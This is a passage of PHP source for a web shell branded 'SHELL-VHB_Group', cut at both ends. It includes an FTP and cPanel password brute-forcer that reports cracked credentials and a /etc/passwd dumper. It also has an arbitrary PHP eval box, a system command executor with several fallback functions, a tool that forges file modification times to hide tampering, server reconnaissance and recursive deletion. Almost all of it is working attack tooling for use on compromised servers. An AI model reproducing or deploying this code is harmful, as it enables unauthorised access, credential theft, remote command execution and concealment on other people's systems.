2609curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);
2610
2611curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
2612
2613curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
2614
2615curl_setopt($ch, CURLOPT_FAILONERROR, 1);
2616
2617$data = curl_exec($ch);
2618
2619if ( curl_errno($ch) == 28 ) {
2620
2621
2622
2623print "<b> Error : Connection timed out , make confidence about validation of target !</b>";
2624
2625exit;}
2626
2627
2628
2629elseif ( curl_errno($ch) == 0 ){
2630
2631
2632
2633p("<b>[ ducdung.08clc@gmail.com ]# </b>
2634
2635<b> Attacking has been done! Username: <font color='#FF0000'> $user </font> / Password:<font color='#FF0000'> $pass </font> => <a href=http://$user:$pass@$host:2082 target=_blank>Login</a></b><br>");
2636
2637}
2638
2639curl_close($ch);}
2640
2641
2642
2643function cpanel_check($host,$user,$pass,$timeout){
2644
2645$ch = curl_init();
2646
2647curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
2648
2649curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
2650
2651curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
2652
2653curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
2654
2655curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
2656
2657curl_setopt($ch, CURLOPT_FAILONERROR, 1);
2658
2659$data = curl_exec($ch);
2660
2661if ( curl_errno($ch) == 28 ) {
2662
2663print "<b> Error : Connection timed out , make confidence about validation of target !</b>";
2664
2665exit;}
2666
2667elseif ( curl_errno($ch) == 0 ){
2668
2669
2670
2671p("<b>[ ducdung.08clc@gmail.com ]# </b><b>Attacking has been done!</a> Username: <font color='#FF0000'> $user </font> / Password:<font color='#FF0000'> $pass </font></b><br>");}curl_close($ch);}
2672
2673
2674
2675if(isset($submit) && !empty($submit)){
2676
2677
2678
2679$userlist = explode ("\n" , $users );
2680
2681$passlist = explode ("\n" , $pass );
2682
2683p('<b>[ ducdung.08clc@gmail.com ]# Attacking ...</font></b><br>');
2684
2685foreach ($userlist as $user) {
2686
2687$_user = trim($user);
2688
2689foreach ($passlist as $password ) {
2690
2691$_pass = trim($password);
2692
2693if($option == "ftp"){
2694
2695ftp_check($target,$_user,$_pass,$connect_timeout);
2696
2697}
2698
2699if ($option == "cpanel")
2700
2701{
2702
2703cpanel_check($target,$_user,$_pass,$connect_timeout);
2704
2705}
2706
2707}
2708
2709}
2710
2711}
2712
2713
2714
2715 formfoot();
2716
2717}
2718
2719
2720
2721
2722
2723
2724
2725
2726
2727
2728
2729
2730
2731elseif ($action == 'etcpwd') {
2732
2733formhead(array('title'=>'Get /etc/passwd'));
2734
2735 makehide('action','etcpwd');
2736
2737 makehide('dir',$nowpath);
2738
2739$i = 0;
2740
2741 echo "<p><br><textarea class=\"area\" id=\"phpcodexxx\" name=\"phpcodexxx\" cols=\"100\" rows=\"25\">";
2742
2743while ($i < 60000) {
2744
2745
2746
2747 $line = posix_getpwuid($i);
2748
2749 if (!empty($line)) {
2750
2751
2752
2753 while (list ($key, $vba_etcpwd) = each($line)){
2754
2755 echo "".$vba_etcpwd."\n";
2756
2757 break;
2758
2759 }
2760
2761
2762
2763 }
2764
2765
2766
2767 $i++;
2768
2769}
2770
2771 echo "</textarea></p>";
2772
2773 formfoot();
2774
2775}
2776
2777
2778
2779elseif ($action == 'eval') {
2780
2781 $phpcode = trim($phpcode);
2782
2783 if($phpcode){
2784
2785 if (!preg_match('#<\?#si', $phpcode)) {
2786
2787 $phpcode = "<?php\n\n{$phpcode}\n\n?>";
2788
2789 }
2790
2791 eval("?".">$phpcode<?");
2792
2793 }
2794
2795 formhead(array('title'=>'Eval PHP Code'));
2796
2797 makehide('action','eval');
2798
2799 maketext(array('title'=>'PHP Code','name'=>'phpcode', 'value'=>$phpcode));
2800
2801 p('<p><a href="http://www.4ngel.net/phpspy/plugin/" target="_blank">Get plugins</a></p>');
2802
2803 formfooter();
2804
2805}//end eval
2806
2807
2808
2809elseif ($action == 'editfile') {
2810
2811 if(file_exists($opfile)) {
2812
2813 $fp=@fopen($opfile,'r');
2814
2815 $contents=@fread($fp, filesize($opfile));
2816
2817 @fclose($fp);
2818
2819 $contents=htmlspecialchars($contents);
2820
2821 }
2822
2823 formhead(array('title'=>'Create / Edit File'));
2824
2825 makehide('action','file');
2826
2827 makehide('dir',$nowpath);
2828
2829 makeinput(array('title'=>'Current File (import new file name and new file)','name'=>'editfilename','value'=>$opfile,'newline'=>1));
2830
2831 maketext(array('title'=>'File Content','name'=>'filecontent','value'=>$contents));
2832
2833 formfooter();
2834
2835}//end editfile
2836
2837
2838
2839elseif ($action == 'newtime') {
2840
2841 $opfilemtime = @filemtime($opfile);
2842
2843 //$time = strtotime("$year-$month-$day $hour:$minute:$second");
2844
2845 $cachemonth = array('January'=>1,'February'=>2,'March'=>3,'April'=>4,'May'=>5,'June'=>6,'July'=>7,'August'=>8,'September'=>9,'October'=>10,'November'=>11,'December'=>12);
2846
2847 formhead(array('title'=>'Clone file was last modified time'));
2848
2849 makehide('action','file');
2850
2851 makehide('dir',$nowpath);
2852
2853 makeinput(array('title'=>'Alter file','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1));
2854
2855 makeinput(array('title'=>'Reference file (fullpath)','name'=>'tarfile','size'=>120,'newline'=>1));
2856
2857 formfooter();
2858
2859 formhead(array('title'=>'Set last modified'));
2860
2861 makehide('action','file');
2862
2863 makehide('dir',$nowpath);
2864
2865 makeinput(array('title'=>'Current file (fullpath)','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1));
2866
2867 p('<p>Instead »');
2868
2869 p('year:');
2870
2871 makeinput(array('name'=>'year','value'=>date('Y',$opfilemtime),'size'=>4));
2872
2873 p('month:');
2874
2875 makeinput(array('name'=>'month','value'=>date('m',$opfilemtime),'size'=>2));
2876
2877 p('day:');
2878
2879 makeinput(array('name'=>'day','value'=>date('d',$opfilemtime),'size'=>2));
2880
2881 p('hour:');
2882
2883 makeinput(array('name'=>'hour','value'=>date('H',$opfilemtime),'size'=>2));
2884
2885 p('minute:');
2886
2887 makeinput(array('name'=>'minute','value'=>date('i',$opfilemtime),'size'=>2));
2888
2889 p('second:');
2890
2891 makeinput(array('name'=>'second','value'=>date('s',$opfilemtime),'size'=>2));
2892
2893 p('</p>');
2894
2895 formfooter();
2896
2897}//end newtime
2898
2899
2900
2901elseif ($action == 'shell') {
2902
2903 if (IS_WIN && IS_COM) {
2904
2905 if($program && $parameter) {
2906
2907 $shell= new COM('Shell.Application');
2908
2909 $a = $shell->ShellExecute($program,$parameter);
2910
2911 m('Program run has '.(!$a ? 'success' : 'fail'));
2912
2913 }
2914
2915 !$program && $program = 'c:\windows\system32\cmd.exe';
2916
2917 !$parameter && $parameter = '/c net start > '.SA_ROOT.'log.txt';
2918
2919 formhead(array('title'=>'Execute Program'));
2920
2921 makehide('action','shell');
2922
2923 makeinput(array('title'=>'Program','name'=>'program','value'=>$program,'newline'=>1));
2924
2925 p('<p>');
2926
2927 makeinput(array('title'=>'Parameter','name'=>'parameter','value'=>$parameter));
2928
2929 makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute'));
2930
2931 p('</p>');
2932
2933 formfoot();
2934
2935 }
2936
2937 formhead(array('title'=>'Execute Command'));
2938
2939 makehide('action','shell');
2940
2941 if (IS_WIN && IS_COM) {
2942
2943 $execfuncdb = array('phpfunc'=>'phpfunc','wscript'=>'wscript','proc_open'=>'proc_open');
2944
2945 makeselect(array('title'=>'Use:','name'=>'execfunc','option'=>$execfuncdb,'selected'=>$execfunc,'newline'=>1));
2946
2947 }
2948
2949 p('<p>');
2950
2951 makeinput(array('title'=>'Command','name'=>'command','value'=>$command));
2952
2953 makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute'));
2954
2955 p('</p>');
2956
2957 formfoot();
2958
2959
2960
2961 if ($command) {
2962
2963 p('<hr width="100%" noshade /><pre>');
2964
2965 if ($execfunc=='wscript' && IS_WIN && IS_COM) {
2966
2967 $wsh = new COM('WScript.shell');
2968
2969 $exec = $wsh->exec('cmd.exe /c '.$command);
2970
2971 $stdout = $exec->StdOut();
2972
2973 $stroutput = $stdout->ReadAll();
2974
2975 echo $stroutput;
2976
2977 } elseif ($execfunc=='proc_open' && IS_WIN && IS_COM) {
2978
2979 $descriptorspec = array(
2980
2981 0 => array('pipe', 'r'),
2982
2983 1 => array('pipe', 'w'),
2984
2985 2 => array('pipe', 'w')
2986
2987 );
2988
2989 $process = proc_open($_SERVER['COMSPEC'], $descriptorspec, $pipes);
2990
2991 if (is_resource($process)) {
2992
2993 fwrite($pipes[0], $command."\r\n");
2994
2995 fwrite($pipes[0], "exit\r\n");
2996
2997 fclose($pipes[0]);
2998
2999 while (!feof($pipes[1])) {
3000
3001 echo fgets($pipes[1], 1024);
3002
3003 }
3004
3005 fclose($pipes[1]);
3006
3007 while (!feof($pipes[2])) {
3008
3009 echo fgets($pipes[2], 1024);
3010
3011 }
3012
3013 fclose($pipes[2]);
3014
3015 proc_close($process);
3016
3017 }
3018
3019 } else {
3020
3021 echo(execute($command));
3022
3023 }
3024
3025 p('</pre>');
3026
3027 }
3028
3029}//end shell
3030
3031
3032
3033elseif ($action == 'phpenv') {
3034
3035 $upsize=getcfg('file_uploads') ? getcfg('upload_max_filesize') : 'Not allowed';
3036
3037 $adminmail=isset($_SERVER['SERVER_ADMIN']) ? $_SERVER['SERVER_ADMIN'] : getcfg('sendmail_from');
3038
3039 !$dis_func && $dis_func = 'No';
3040
3041 $info = array(
3042
3043 1 => array('Server Time',date('Y/m/d h:i:s',$timestamp)),
3044
3045 2 => array('Server Domain',$_SERVER['SERVER_NAME']),
3046
3047 3 => array('Server IP',gethostbyname($_SERVER['SERVER_NAME'])),
3048
3049 4 => array('Server OS',PHP_OS),
3050
3051 5 => array('Server OS Charset',$_SERVER['HTTP_ACCEPT_LANGUAGE']),
3052
3053 6 => array('Server Software',$_SERVER['SERVER_SOFTWARE']),
3054
3055 7 => array('Server Web Port',$_SERVER['SERVER_PORT']),
3056
3057 8 => array('PHP run mode',strtoupper(php_sapi_name())),
3058
3059 9 => array('The file path',__FILE__),
3060
3061
3062
3063 10 => array('PHP Version',PHP_VERSION),
3064
3065 11 => array('PHPINFO',(IS_PHPINFO ? '<a href="javascript:goaction(\'phpinfo\');">Yes</a>' : 'No')),
3066
3067 12 => array('Safe Mode',getcfg('safe_mode')),
3068
3069 13 => array('Administrator',$adminmail),
3070
3071 14 => array('allow_url_fopen',getcfg('allow_url_fopen')),
3072
3073 15 => array('enable_dl',getcfg('enable_dl')),
3074
3075 16 => array('display_errors',getcfg('display_errors')),
3076
3077 17 => array('register_globals',getcfg('register_globals')),
3078
3079 18 => array('magic_quotes_gpc',getcfg('magic_quotes_gpc')),
3080
3081 19 => array('memory_limit',getcfg('memory_limit')),
3082
3083 20 => array('post_max_size',getcfg('post_max_size')),
3084
3085 21 => array('upload_max_filesize',$upsize),
3086
3087 22 => array('max_execution_time',getcfg('max_execution_time').' second(s)'),
3088
3089 23 => array('disable_functions',$dis_func),
3090
3091 );
3092
3093
3094
3095 if($phpvarname) {
3096
3097 m($phpvarname .' : '.getcfg($phpvarname));
3098
3099 }
3100
3101
3102
3103 formhead(array('title'=>'Server environment'));
3104
3105 makehide('action','phpenv');
3106
3107 makeinput(array('title'=>'Please input PHP configuration parameter(eg:magic_quotes_gpc)','name'=>'phpvarname','value'=>$phpvarname,'newline'=>1));
3108
3109 formfooter();
3110
3111
3112
3113 $hp = array(0=> 'Server', 1=> 'PHP');
3114
3115 for($a=0;$a<2;$a++) {
3116
3117 p('<h2>'.$hp[$a].' »</h2>');
3118
3119 p('<ul class="info">');
3120
3121 if ($a==0) {
3122
3123 for($i=1;$i<=9;$i++) {
3124
3125 p('<li><u>'.$info[$i][0].':</u>'.$info[$i][1].'</li>');
3126
3127 }
3128
3129 } elseif ($a == 1) {
3130
3131 for($i=10;$i<=23;$i++) {
3132
3133 p('<li><u>'.$info[$i][0].':</u>'.$info[$i][1].'</li>');
3134
3135 }
3136
3137 }
3138
3139 p('</ul>');
3140
3141 }
3142
3143}//end phpenv
3144
3145
3146
3147else {
3148
3149 m('Undefined Action');
3150
3151}
3152
3153
3154
3155?>
3156
3157</td></tr></table>
3158
3159<div style="padding:10px;border-bottom:1px solid #0E0E0E;border-top:1px solid #0E0E0E;background:#0E0E0E;">
3160
3161 <span style="float:right;"><?php debuginfo();ob_end_flush();?></span>
3162
3163 Copyright (C) 2011 <B>[Mr.Soleil]</B> - Develop by <a href=# target=_blank><B>VHB_Group-</B></a> All Rights Reserved.</div>
3164
3165</body>
3166
3167</html>
3168
3169
3170
3171<?php
3172
3173
3174
3175/*======================================================
3176
3177Show info shell
3178
3179======================================================*/
3180
3181
3182
3183function m($msg) {
3184
3185 echo '<div style="background:#f1f1f1;border:1px solid #ddd;padding:15px;font:14px;text-align:center;font-weight:bold;">';
3186
3187 echo $msg;
3188
3189 echo '</div>';
3190
3191}
3192
3193function scookie($key, $value, $life = 0, $prefix = 1) {
3194
3195 global $admin, $timestamp, $_SERVER;
3196
3197 $key = ($prefix ? $admin['cookiepre'] : '').$key;
3198
3199 $life = $life ? $life : $admin['cookielife'];
3200
3201 $useport = $_SERVER['SERVER_PORT'] == 443 ? 1 : 0;
3202
3203 setcookie($key, $value, $timestamp+$life, $admin['cookiepath'], $admin['cookiedomain'], $useport);
3204
3205}
3206
3207function multi($num, $perpage, $curpage, $tablename) {
3208
3209 $multipage = '';
3210
3211 if($num > $perpage) {
3212
3213 $page = 10;
3214
3215 $offset = 5;
3216
3217 $pages = @ceil($num / $perpage);
3218
3219 if($page > $pages) {
3220
3221 $from = 1;
3222
3223 $to = $pages;
3224
3225 } else {
3226
3227 $from = $curpage - $offset;
3228
3229 $to = $curpage + $page - $offset - 1;
3230
3231 if($from < 1) {
3232
3233 $to = $curpage + 1 - $from;
3234
3235 $from = 1;
3236
3237 if(($to - $from) < $page && ($to - $from) < $pages) {
3238
3239 $to = $page;
3240
3241 }
3242
3243 } elseif($to > $pages) {
3244
3245 $from = $curpage - $pages + $to;
3246
3247 $to = $pages;
3248
3249 if(($to - $from) < $page && ($to - $from) < $pages) {
3250
3251 $from = $pages - $page + 1;
3252
3253 }
3254
3255 }
3256
3257 }
3258
3259 $multipage = ($curpage - $offset > 1 && $pages > $page ? '<a href="javascript:settable(\''.$tablename.'\', \'\', 1);">First</a> ' : '').($curpage > 1 ? '<a href="javascript:settable(\''.$tablename.'\', \'\', '.($curpage - 1).');">Prev</a> ' : '');
3260
3261 for($i = $from; $i <= $to; $i++) {
3262
3263 $multipage .= $i == $curpage ? $i.' ' : '<a href="javascript:settable(\''.$tablename.'\', \'\', '.$i.');">['.$i.']</a> ';
3264
3265 }
3266
3267 $multipage .= ($curpage < $pages ? '<a href="javascript:settable(\''.$tablename.'\', \'\', '.($curpage + 1).');">Next</a>' : '').($to < $pages ? ' <a href="javascript:settable(\''.$tablename.'\', \'\', '.$pages.');">Last</a>' : '');
3268
3269 $multipage = $multipage ? '<p>Pages: '.$multipage.'</p>' : '';
3270
3271 }
3272
3273 return $multipage;
3274
3275}
3276
3277// Login page
3278
3279function loginpage() {
3280
3281?>
3282
3283<html>
3284
3285<head>
3286
3287
3288
3289<body bgcolor=black background=http://i1124.photobucket.com/albums/l575/givay/th_matrix.gif>
3290
3291
3292
3293 <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
3294
3295<title>Mr.Soleil VHB_Group</title>
3296
3297<style type="text/css">
3298
3299A:link {text-decoration: none; color: green }
3300
3301A:visited {text-decoration: none;color:red}
3302
3303A:active {text-decoration: none}
3304
3305A:hover {text-decoration: underline; color: green;}
3306
3307input, textarea, button
3308
3309{
3310
3311 font-size: 9pt;
3312
3313 color: #ccc;
3314
3315 font-family: verdana, sans-serif;
3316
3317 background-color: #202020;
3318
3319 border-left: 1px solid #74A202;
3320
3321 border-top: 1px solid #74A202;
3322
3323 border-right: 1px solid #74A202;
3324
3325 border-bottom: 1px solid #74A202;
3326
3327}
3328
3329
3330
3331</style>
3332
3333
3334
3335 <BR><BR>
3336
3337<div align=center >
3338
3339<fieldset style="border: 1px solid rgb(69, 69, 69); padding: 4px;width:450px;bgcolor:white;align:center;font-family:tahoma;font-size:10pt"><legend><font color=red><B>Login</b></font></legend>
3340
3341
3342
3343<div>
3344
3345<font color=gray>
3346
3347<font color=yellow>==[ <B>SHELL-VHB_Group</B> ]== </font><BR><BR>
3348
3349
3350
3351<form method="POST" action="">
3352
3353 <span style="font:10pt tahoma;">Password: </span><input name="password" type="password" size="20">
3354
3355 <input type="hidden" name="doing" value="login">
3356
3357 <input type="submit" value="Login">
3358
3359 </form>
3360
3361<BR>
3362
3363<?php
3364
3365echo "".$err_mess."";
3366
3367?>
3368
3369
3370
3371 <B><font color=red>
3372
3373<a href=#>HACKING - SECURITY - PROGRAMMING</a><BR></b> <br>
3374
3375 <B><font color=red>
3376
3377<a href=> Edit & Develop by Mr.Soleil - VHB_Group </a><BR></b></br>
3378
3379 <B><font color=blue>
3380
3381<a href=http://vhbgroup.net>vhbgroup.net</a><BR></b>
3382
3383
3384
3385
3386
3387
3388
3389
3390
3391
3392
3393</div>
3394
3395
3396
3397
3398
3399 </fieldset>
3400
3401
3402
3403
3404
3405
3406
3407</head>
3408
3409</html>
3410
3411
3412
3413
3414
3415<?php
3416
3417 exit;
3418
3419
3420
3421}//end loginpage()
3422
3423
3424
3425function execute($cfe) {
3426
3427 $res = '';
3428
3429 if ($cfe) {
3430
3431 if(function_exists('exec')) {
3432
3433 @exec($cfe,$res);
3434
3435 $res = join("\n",$res);
3436
3437 } elseif(function_exists('shell_exec')) {
3438
3439 $res = @shell_exec($cfe);
3440
3441 } elseif(function_exists('system')) {
3442
3443 @ob_start();
3444
3445 @system($cfe);
3446
3447 $res = @ob_get_contents();
3448
3449 @ob_end_clean();
3450
3451 } elseif(function_exists('passthru')) {
3452
3453 @ob_start();
3454
3455 @passthru($cfe);
3456
3457 $res = @ob_get_contents();
3458
3459 @ob_end_clean();
3460
3461 } elseif(@is_resource($f = @popen($cfe,"r"))) {
3462
3463 $res = '';
3464
3465 while(!@feof($f)) {
3466
3467 $res .= @fread($f,1024);
3468
3469 }
3470
3471 @pclose($f);
3472
3473 }
3474
3475 }
3476
3477 return $res;
3478
3479}
3480
3481function which($pr) {
3482
3483 $path = execute("which $pr");
3484
3485 return ($path ? $path : $pr);
3486
3487}
3488
3489
3490
3491function cf($fname,$text){
3492
3493 if($fp=@fopen($fname,'w')) {
3494
3495 @fputs($fp,@base64_decode($text));
3496
3497 @fclose($fp);
3498
3499 }
3500
3501}
3502
3503
3504
3505// Debug
3506
3507function debuginfo() {
3508
3509 global $starttime;
3510
3511 $mtime = explode(' ', microtime());
3512
3513 $totaltime = number_format(($mtime[1] + $mtime[0] - $starttime), 6);
3514
3515 echo 'Processed in '.$totaltime.' second(s)';
3516
3517}
3518
3519
3520
3521// Function connect database
3522
3523function dbconn($dbhost,$dbuser,$dbpass,$dbname='',$charset='',$dbport='3306') {
3524
3525 if(!$link = @mysql_connect($dbhost.':'.$dbport, $dbuser, $dbpass)) {
3526
3527 p('<h2>Can not connect to MySQL server</h2>');
3528
3529 exit;
3530
3531 }
3532
3533 if($link && $dbname) {
3534
3535 if (!@mysql_select_db($dbname, $link)) {
3536
3537 p('<h2>Database selected has error</h2>');
3538
3539 exit;
3540
3541 }
3542
3543 }
3544
3545 if($link && mysql_get_server_info() > '4.1') {
3546
3547 if(in_array(strtolower($charset), array('gbk', 'big5', 'utf8'))) {
3548
3549 q("SET character_set_connection=$charset, character_set_results=$charset, character_set_client=binary;", $link);
3550
3551 }
3552
3553 }
3554
3555 return $link;
3556
3557}
3558
3559
3560
3561// Array strip
3562
3563function s_array(&$array) {
3564
3565 if (is_array($array)) {
3566
3567 foreach ($array as $k => $v) {
3568
3569 $array[$k] = s_array($v);
3570
3571 }
3572
3573 } else if (is_string($array)) {
3574
3575 $array = stripslashes($array);
3576
3577 }
3578
3579 return $array;
3580
3581}
3582
3583
3584
3585// HTML Strip
3586
3587function html_clean($content) {
3588
3589 $content = htmlspecialchars($content);
3590
3591 $content = str_replace("\n", "<br />", $content);
3592
3593 $content = str_replace(" ", " ", $content);
3594
3595 $content = str_replace("\t", " ", $content);
3596
3597 return $content;
3598
3599}
3600
3601
3602
3603// Chmod
3604
3605function getChmod($filepath){
3606
3607 return substr(base_convert(@fileperms($filepath),10,8),-4);
3608
3609}
3610
3611
3612
3613function getPerms($filepath) {
3614
3615 $mode = @fileperms($filepath);
3616
3617 if (($mode & 0xC000) === 0xC000) {$type = 's';}
3618
3619 elseif (($mode & 0x4000) === 0x4000) {$type = 'd';}
3620
3621 elseif (($mode & 0xA000) === 0xA000) {$type = 'l';}
3622
3623 elseif (($mode & 0x8000) === 0x8000) {$type = '-';}
3624
3625 elseif (($mode & 0x6000) === 0x6000) {$type = 'b';}
3626
3627 elseif (($mode & 0x2000) === 0x2000) {$type = 'c';}
3628
3629 elseif (($mode & 0x1000) === 0x1000) {$type = 'p';}
3630
3631 else {$type = '?';}
3632
3633
3634
3635 $owner['read'] = ($mode & 00400) ? 'r' : '-';
3636
3637 $owner['write'] = ($mode & 00200) ? 'w' : '-';
3638
3639 $owner['execute'] = ($mode & 00100) ? 'x' : '-';
3640
3641 $group['read'] = ($mode & 00040) ? 'r' : '-';
3642
3643 $group['write'] = ($mode & 00020) ? 'w' : '-';
3644
3645 $group['execute'] = ($mode & 00010) ? 'x' : '-';
3646
3647 $world['read'] = ($mode & 00004) ? 'r' : '-';
3648
3649 $world['write'] = ($mode & 00002) ? 'w' : '-';
3650
3651 $world['execute'] = ($mode & 00001) ? 'x' : '-';
3652
3653
3654
3655 if( $mode & 0x800 ) {$owner['execute'] = ($owner['execute']=='x') ? 's' : 'S';}
3656
3657 if( $mode & 0x400 ) {$group['execute'] = ($group['execute']=='x') ? 's' : 'S';}
3658
3659 if( $mode & 0x200 ) {$world['execute'] = ($world['execute']=='x') ? 't' : 'T';}
3660
3661
3662
3663 return $type.$owner['read'].$owner['write'].$owner['execute'].$group['read'].$group['write'].$group['execute'].$world['read'].$world['write'].$world['execute'];
3664
3665}
3666
3667
3668
3669function getUser($filepath) {
3670
3671 if (function_exists('posix_getpwuid')) {
3672
3673 $array = @posix_getpwuid(@fileowner($filepath));
3674
3675 if ($array && is_array($array)) {
3676
3677 return ' / <a href="#" title="User: '.$array['name'].'
Passwd: '.$array['passwd'].'
Uid: '.$array['uid'].'
gid: '.$array['gid'].'
Gecos: '.$array['gecos'].'
Dir: '.$array['dir'].'
Shell: '.$array['shell'].'">'.$array['name'].'</a>';
3678
3679 }
3680
3681 }
3682
3683 return '';
3684
3685}
3686
3687
3688
3689// Delete dir
3690
3691function deltree($deldir) {
3692
3693 $mydir=@dir($deldir);
3694
3695 while($file=$mydir->read()) {
3696
3697 if((is_dir($deldir.'/'.$file)) && ($file!='.') && ($file!='..')) {
3698
3699 @chmod($deldir.'/'.$file,0777);
3700
3701 deltree($deldir.'/'.$file);
3702
3703 }
3704
3705 if (is_file($deldir.'/'.$file)) {
3706
3707 @chmod($deldir.'/'.$file,0777);
3708
3709 @unlink($deldir.'/'.$file);
3710
3711 }
3712
3713 }
3714
3715 $mydir->close();
3716
3717 @chmod($deldir,0777);
3718
3719 return @rmdir($deldir) ? 1 : 0;
3720
3721}
3722
3723
3724
3725// Background
3726
3727function bg() {
3728
3729 global $bgc;
3730
3731 return ($bgc++%2==0) ? 'alt1' : 'alt2';
3732
3733}
3734
3735
3736
3737// Get path
3738
3739function getPath($scriptpath, $nowpath) {
3740
3741 if ($nowpath == '.') {
3742
3743 $nowpath = $scriptpath;
3744
3745 }
3746
3747 $nowpath = str_replace('\\', '/', $nowpath);
3748
3749 $nowpath = str_replace('//', '/', $nowpath);
3750
3751 if (substr($nowpath, -1) != '/') {
3752
3753 $nowpath = $nowpath.'/';
3754
3755 }
3756
3757 return $nowpath;
3758
3759}
3760
3761
3762
3763// Get up path
3764
3765function getUpPath($nowpath) {
3766
3767 $pathdb = explode('/', $nowpath);
3768
3769 $num = count($pathdb);
3770
3771 if ($num > 2) {
3772
3773 unset($pathdb[$num-1],$pathdb[$num-2]);
3774
3775 }
3776
3777 $uppath = implode('/', $pathdb).'/';
3778
3779 $uppath = str_replace('//', '/', $uppath);
3780
3781 return $uppath;
3782
3783}
3784
3785
3786
3787// Config
3788
3789function getcfg($varname) {
3790
3791 $result = get_cfg_var($varname);
3792
3793 if ($result == 0) {
3794
3795 return 'No';
3796
3797 } elseif ($result == 1) {
3798
3799 return 'Yes';
3800
3801 } else {
3802
3803 return $result;
3804
3805 }
3806
3807}
3808
3809
3810
3811// Function name
3812
3813function getfun($funName) {
3814
3815 return (false !== function_exists($funName)) ? 'Yes' : 'No';
3816
3817}
3818
3819
3820
3821function GetList($dir){
3822
3823 global $dirdata,$j,$nowpath;
3824
3825 !$j && $j=1;
3826
3827 if ($dh = opendir($dir)) {
3828
3829 while ($file = readdir($dh)) {
3830
3831 $f=str_replace('//','/',$dir.'/'.$file);
3832
3833 if($file!='.' && $file!='..' && is_dir($f)){
3834
3835 if (is_writable($f)) {
3836
3837 $dirdata[$j]['filename']=str_replace($nowpath,'',$f);
3838
3839 $dirdata[$j]['mtime']=@date('Y-m-d H:i:s',filemtime($f));
3840
3841 $dirdata[$j]['dirchmod']=getChmod($f);
3842
3843 $dirdata[$j]['dirperm']=getPerms($f);
3844
3845 $dirdata[$j]['dirlink']=ue($dir);
3846
3847 $dirdata[$j]['server_link']=$f;
3848
3849 $dirdata[$j]['client_link']=ue($f);
3850
3851 $j++;
3852
3853 }
3854
3855 GetList($f);
3856
3857 }
3858
3859 }
3860
3861 closedir($dh);
3862
3863 clearstatcache();
3864
3865 return $dirdata;
3866
3867 } else {
3868
3869 return array();
3870
3871 }
3872
3873}
3874
3875
3876
3877function qy($sql) {
3878
3879 //echo $sql.'<br>';
3880
3881 $res = $error = '';
3882
3883 if(!$res = @mysql_query($sql)) {
3884
3885 return 0;
3886
3887 } else if(is_resource($res)) {
3888
3889 return 1;
3890
3891 } else {
3892
3893 return 2;
3894
3895 }
3896
3897 return 0;
3898
3899}
3900
3901
3902
3903function q($sql) {
3904
3905 return @mysql_query($sql);
3906
3907}
3908
3909
3910
3911function fr($qy){
3912
3913 mysql_free_result($qy);
3914
3915}
3916
3917
3918
3919function sizecount($size) {
3920
3921 if($size > 1073741824) {
3922
3923 $size = round($size / 1073741824 * 100) / 100 . ' G';
3924
3925 } elseif($size > 1048576) {
3926
3927 $size = round($size / 1048576 * 100) / 100 . ' M';
3928
3929 } elseif($size > 1024) {
3930
3931 $size = round($size / 1024 * 100) / 100 . ' K';
3932
3933 } else {
3934
3935 $size = $size . ' B';
3936
3937 }
3938
3939 return $size;
3940
3941}
3942
3943
3944
3945// Zip
3946
3947class PHPZip{
3948
3949 var $out='';
3950
3951 function PHPZip($dir) {
3952
3953 if (@function_exists('gzcompress')) {
3954
3955 $curdir = getcwd();
3956
3957 if (is_array($dir)) $filelist = $dir;
3958
3959 else{
3960
3961 $filelist=$this -> GetFileList($dir);//File list
3962
3963 foreach($filelist as $k=>$v) $filelist[]=substr($v,strlen($dir)+1);
3964
3965 }
3966
3967 if ((!empty($dir))&&(!is_array($dir))&&(file_exists($dir))) chdir($dir);
3968
3969 else chdir($curdir);
3970
3971 if (count($filelist)>0){
3972
3973 foreach($filelist as $filename){
3974
3975 if (is_file($filename)){
3976
3977 $fd = fopen ($filename, 'r');
3978
3979 $content = @fread ($fd, filesize($filename));
3980
3981 fclose ($fd);
3982
3983 if (is_array($dir)) $filename = basename($filename);
3984
3985 $this -> addFile($content, $filename);
3986
3987 }
3988
3989 }
3990
3991 $this->out = $this -> file();
3992
3993 chdir($curdir);
3994
3995 }
3996
3997 return 1;
3998
3999 }
4000
4001 else return 0;
4002
4003 }
4004
4005
4006
4007 // Show file list
4008
4009 function GetFileList($dir){
4010
4011 static $a;
4012
4013 if (is_dir($dir)) {
4014
4015 if ($dh = opendir($dir)) {
4016
4017 while ($file = readdir($dh)) {
4018
4019 if($file!='.' && $file!='..'){
4020
4021 $f=$dir .'/'. $file;
4022
4023 if(is_dir($f)) $this->GetFileList($f);
4024
4025 $a[]=$f;
4026
4027 }
4028
4029 }
4030
4031 closedir($dh);
4032
4033 }
4034
4035 }
4036
4037 return $a;
4038
4039 }
4040
4041
4042
4043 var $datasec = array();
4044
4045 var $ctrl_dir = array();
4046
4047 var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
4048
4049 var $old_offset = 0;
4050
4051
4052
4053 function unix2DosTime($unixtime = 0) {
4054
4055 $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
4056
4057 if ($timearray['year'] < 1980) {
4058
4059 $timearray['year'] = 1980;
4060
4061 $timearray['mon'] = 1;
4062
4063 $timearray['mday'] = 1;
4064
4065 $timearray['hours'] = 0;
4066
4067 $timearray['minutes'] = 0;
4068
4069 $timearray['seconds'] = 0;
4070
4071 } // end if
4072
4073 return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
4074
4075 ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
4076
4077 }
4078
4079
4080
4081 function addFile($data, $name, $time = 0) {
4082
4083 $name = str_replace('\\', '/', $name);
4084
4085
4086
4087 $dtime = dechex($this->unix2DosTime($time));
4088
4089 $hexdtime = '\x' . $dtime[6] . $dtime[7]
4090
